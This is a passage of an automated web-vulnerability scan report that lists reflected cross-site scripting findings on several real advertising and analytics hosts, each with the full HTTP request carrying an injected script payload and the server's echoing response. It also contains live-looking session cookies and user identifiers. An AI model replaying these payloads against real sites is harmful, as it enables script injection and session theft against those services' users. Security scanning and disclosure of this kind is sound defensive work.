GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=00009976dc4<script>alert(1)</script>e5a3998eb1c&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17189
Date: Sat, 17 Sep 2011 01:52:31 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<style type="text/css">
html, body { margin:0; padding:0; height:100%; border:none; }
a, a:visited { color:#00009976dc4<script>alert(1)</script>e5a3998eb1c; font-weight:bold; }
.MainContentArea { background-color:#efefef; font-family:Verdana, Arial, Helvetica, sans-serif; }
.HasBorder { border:solid 1px #efefef; }
.TitleText { color:#000000; font-weig
...[SNIP]...
|
4.57. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_normal parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://alerts.4info.com |
| Path: |
/alert/ads/dispatcher.jsp |
Issue detail
The value of the color_text_normal request parameter is copied into the HTML document as plain text between tags. The payload 86a95<script>alert(1)</script>6511ba6bdbc was submitted in the color_text_normal parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=00000086a95<script>alert(1)</script>6511ba6bdbc&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17230
Date: Sat, 17 Sep 2011 01:53:09 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
lor:#efefef; font-family:Verdana, Arial, Helvetica, sans-serif; }
.HasBorder { border:solid 1px #efefef; }
.TitleText { color:#000000; font-weight:bold; font-size:10px; }
.NormalText { color:#00000086a95<script>alert(1)</script>6511ba6bdbc; font-size:10px; }
.MsgText { color:red; font-size:10px; }
.nobold { font-weight:normal; }
#headerDiv { background-color:#FFF;margin:2px;margin-top:0px;font-size:11px;font-weight:bold; }
#header
...[SNIP]...
|
4.58. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_normal parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://alerts.4info.com |
| Path: |
/alert/ads/dispatcher.jsp |
Issue detail
The value of the color_text_normal request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc3c7"><script>alert(1)</script>9ace1e3c9ad was submitted in the color_text_normal parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000bc3c7"><script>alert(1)</script>9ace1e3c9ad&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17234
Date: Sat, 17 Sep 2011 01:53:06 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<div style="width:nullpx;font-size:10px;font-family:Verdana, Arial, Helvetica, sans-serif;line-height:13px;color:#000000bc3c7"><script>alert(1)</script>9ace1e3c9ad;background-color:#efefef">
...[SNIP]...
|
4.59. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_title parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://alerts.4info.com |
| Path: |
/alert/ads/dispatcher.jsp |
Issue detail
The value of the color_text_title request parameter is copied into the HTML document as plain text between tags. The payload 835d5<script>alert(1)</script>6102431f71c was submitted in the color_text_title parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000835d5<script>alert(1)</script>6102431f71c&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17189
Date: Sat, 17 Sep 2011 01:52:50 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
lor:#000099; font-weight:bold; }
.MainContentArea { background-color:#efefef; font-family:Verdana, Arial, Helvetica, sans-serif; }
.HasBorder { border:solid 1px #efefef; }
.TitleText { color:#000000835d5<script>alert(1)</script>6102431f71c; font-weight:bold; font-size:10px; }
.NormalText { color:#000000; font-size:10px; }
.MsgText { color:red; font-size:10px; }
.nobold { font-weight:normal; }
#headerDiv { background-color:#FFF;mar
...[SNIP]...
|
4.60. http://alerts.4info.com/alert/ads/dispatcher.jsp [default_league parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://alerts.4info.com |
| Path: |
/alert/ads/dispatcher.jsp |
Issue detail
The value of the default_league request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 688d1'%3balert(1)//add2da0c4a4 was submitted in the default_league parameter. This input was echoed as 688d1';alert(1)//add2da0c4a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl688d1'%3balert(1)//add2da0c4a4&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17176
Date: Sat, 17 Sep 2011 01:53:51 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
Id, conference, conferenceId, teamId);
populateMenu("leagueId", "leagues", "", "", "", "", "");
function setLeague() {
if (getSelectVal('leagueId') == '-1') {
defaultSelectTo('leagueId', 'nfl688d1';alert(1)//add2da0c4a4');
setTimeout('leagueSelect()',500);
}
}
function setConference() {
if (getSelectVal('conferenceId') == '-1') {
defaultSelectTo('conferenceId', 'null');
setTimeout('conferenceSelect()'
...[SNIP]...
|
4.61. http://alerts.4info.com/alert/ads/dispatcher.jsp [default_team parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://alerts.4info.com |
| Path: |
/alert/ads/dispatcher.jsp |
Issue detail
The value of the default_team request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82a46'%3balert(1)//40d577401fd was submitted in the default_team parameter. This input was echoed as 82a46';alert(1)//40d577401fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=82a46'%3balert(1)//40d577401fd&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17176
Date: Sat, 17 Sep 2011 01:54:11 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
ceId') == '-1') {
defaultSelectTo('conferenceId', 'null');
setTimeout('conferenceSelect()',500);
}
}
function setTeam() {
if (getSelectVal('teamId') == '-1')
defaultSelectTo('teamId', '82a46';alert(1)//40d577401fd');
}
setTimeout('setLeague()',500);
setTimeout('setLeague()',1500);
setTimeout('setLeague()',2500);
setTimeout('setTeam()',1500);
setTimeout('setTeam()',2500);
setTimeout('setTeam()
...[SNIP]...
|
4.62. http://api.bizographics.com/v2/profile.redirect [api_key parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://api.bizographics.com |
| Path: |
/v2/profile.redirect |
Issue detail
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload b2604<script>alert(1)</script>e25fa51e76a was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v2/profile.redirect?api_key=1be3a6866fd64648a7b0c808e8551702b2604<script>alert(1)</script>e25fa51e76a&group_delimiter=,&industry_delimiter=,&functional_area_delimiter=,&callback_url=http://aud.pubmatic.com/AdServer/Artemis?dpid=7 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=27330&s=27331&a=23101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT
|
Response
HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sat, 17 Sep 2011 01:17:40 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=af410166-6960-4ca8-98db-488008c83cf7;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive
Unknown API key: (1be3a6866fd64648a7b0c808e8551702b2604<script>alert(1)</script>e25fa51e76a) |
4.63. http://api.dimestore.com/viapi [id parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://api.dimestore.com |
| Path: |
/viapi |
Issue detail
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 7be4b<a>cfdf0815b78 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /viapi?action=pixel&id=7117492757be4b<a>cfdf0815b78 HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10;sz=728x90;click=http://log.go.com/log?srvc%3dabc%26guid%3d7D9136E5-7896-4338-9939-E469671F34DA%26drop%3d0%26addata%3d0:91104:841141:52312%26a%3d1%26goto%3d;pc=dig841141dc1010790;ord=2011.09.16.17.57.56?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pixel_eb2039789=1; respondentId=aa84b8a80c474deb8a2607134fb0172a; respondentEmail=""; IgUsFjsrORc3NyILDBo6HychGw%3D%3D=EyADRWJEY0FpdVF%2BSWQ%3D; Mlo9CTINKhomHCQJNys5Fzc3Igs%3D=dkd8VQ%3D%3D; Mlo9CTINKhomHCQJNysrEzEh=""; IBogOiIBKgExLQYjCzIdPRcaNwEiEj0rfkN2fF4%3D=dQ%3D%3D
|
Response
HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Sat, 17 Sep 2011 01:06:42 GMT
Content-Type: application/xml
Connection: keep-alive
Set-Cookie: pixel_7117492757be4b<a>cfdf0815b78=1; Expires=Sun, 16-Sep-2012 01:06:42 GMT
Content-Length: 55
// DIMESTORE PIXEL OK -- 7117492757be4b<a>cfdf0815b78
|
4.64. http://ar.voicefive.com/b/rc.pli [func parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ar.voicefive.com |
| Path: |
/b/rc.pli |
Issue detail
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 8df99<script>alert(1)</script>8a03bb991cc was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction8df99<script>alert(1)</script>8a03bb991cc&n=ar_int_p63514475&1316238877286 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1316220781%2E709%2Cwait%2D%3E10000%2C
|
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 00:55:06 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83
COMSCORE.BMX.Broker.handleInteraction8df99<script>alert(1)</script>8a03bb991cc(""); |
4.65. http://b.scorecardresearch.com/beacon.js [c1 parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://b.scorecardresearch.com |
| Path: |
/beacon.js |
Issue detail
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 41452<script>alert(1)</script>b5bc8226dea was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=741452<script>alert(1)</script>b5bc8226dea&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633
|
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:02 GMT
Date: Sat, 17 Sep 2011 00:52:02 GMT
Content-Length: 1235
Connection: close
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"741452<script>alert(1)</script>b5bc8226dea", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
|
4.66. http://b.scorecardresearch.com/beacon.js [c10 parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://b.scorecardresearch.com |
| Path: |
/beacon.js |
Issue detail
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 66a83<script>alert(1)</script>803fdeef77b was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=3005693&c3=17&c4=http%3A%2F%2Fwww.bradsdeals.com&c5=&c6=&c10=66a83<script>alert(1)</script>803fdeef77b&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633
|
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 01:37:02 GMT
Date: Sat, 17 Sep 2011 01:37:02 GMT
Content-Length: 1261
Connection: close
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"17", c4:"http://www.bradsdeals.com", c5:"", c6:"", c10:"66a83<script>alert(1)</script>803fdeef77b", c15:"", c16:"", r:""});
|
4.67. http://b.scorecardresearch.com/beacon.js [c15 parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://b.scorecardresearch.com |
| Path: |
/beacon.js |
Issue detail
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 961ba<script>alert(1)</script>5ef4d07457b was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=961ba<script>alert(1)</script>5ef4d07457b&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633
|
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:09 GMT
Date: Sat, 17 Sep 2011 00:52:09 GMT
Content-Length: 1235
Connection: close
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"961ba<script>alert(1)</script>5ef4d07457b", c16:"", r:""});
|
4.68. http://b.scorecardresearch.com/beacon.js [c2 parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://b.scorecardresearch.com |
| Path: |
/beacon.js |
Issue detail
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 3d1ac<script>alert(1)</script>969635bd65a was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=59648883d1ac<script>alert(1)</script>969635bd65a&c3=2&c4=&c5=&c6=&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633
|
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:03 GMT
Date: Sat, 17 Sep 2011 00:52:03 GMT
Content-Length: 1235
Connection: close
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"59648883d1ac<script>alert(1)</script>969635bd65a", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
|
4.69. http://b.scorecardresearch.com/beacon.js [c3 parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://b.scorecardresearch.com |
| Path: |
/beacon.js |
Issue detail
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload dcffa<script>alert(1)</script>16a4cf57524 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2dcffa<script>alert(1)</script>16a4cf57524&c4=&c5=&c6=&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633
|
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:05 GMT
Date: Sat, 17 Sep 2011 00:52:05 GMT
Content-Length: 1235
Connection: close
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
